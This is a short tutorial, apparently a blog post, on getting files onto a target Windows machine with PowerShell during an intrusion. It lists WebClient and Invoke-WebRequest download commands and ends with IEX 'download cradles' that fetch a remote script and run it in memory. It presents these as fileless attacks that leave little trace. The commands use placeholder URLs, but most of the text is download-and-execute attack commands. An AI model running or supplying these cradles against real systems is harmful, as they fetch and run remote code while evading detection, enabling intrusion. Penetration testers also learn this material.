Hackers don’t use Dropbox or Google Drive to transfer files to their target in fact they avoid these services on their expeditions all together. A hacker may not even download the file directory but upload it directly to memory where its then used this is called a fileless attack. Fileless attacks typically don’t leave a trace since the file was never saved to disk and only run in memory.
Downloading Files Using PowerShell
Note (C:\Users\Public\Downloads\<file name>) is the path where I’m wanting to save the file.
> (New-Object Net.WebClient).DownloadFile('https://[file_URL]', 'C:\Users\Public\Downloads\[file_name]')
Invoke Web-Request
On PowerShell 3.0 or newer you can use Invoke Web-Request to download files you can also use the alias iwr.
Invoke-WebRequest 'https://[file_URL]' -OutFile 'C:\Users\Public\Downloads\[file_name]'
iwr "https://[file_URL]" -OutFile 'C:\Users\Public\Downloads\[file_name]'
Getting a Browser Error
If getting a browser error when trying to download a file using the command about use the flag -UseBasicParsing
iwr "https://[file_URL]" -OutFile 'C:\Users\Public\Downloads\[file_name]' -UseBasicParsing
Cradles
On Windows, cradles allow you to utilize PowerShell to download files and run them in memory. The secret sauce here is the (IEX) Invoke Expression, which tells the computer not to write the file to disk and to run it in memory instead. This is great for transferring scripts to a target since it doesn’t leave much of a trace.
> IEX (New-Object Net.Webclient).DownloadString(https://[script_URL])
Invoke Web Request Cradle
IEX(iwr 'http://[script_URL]')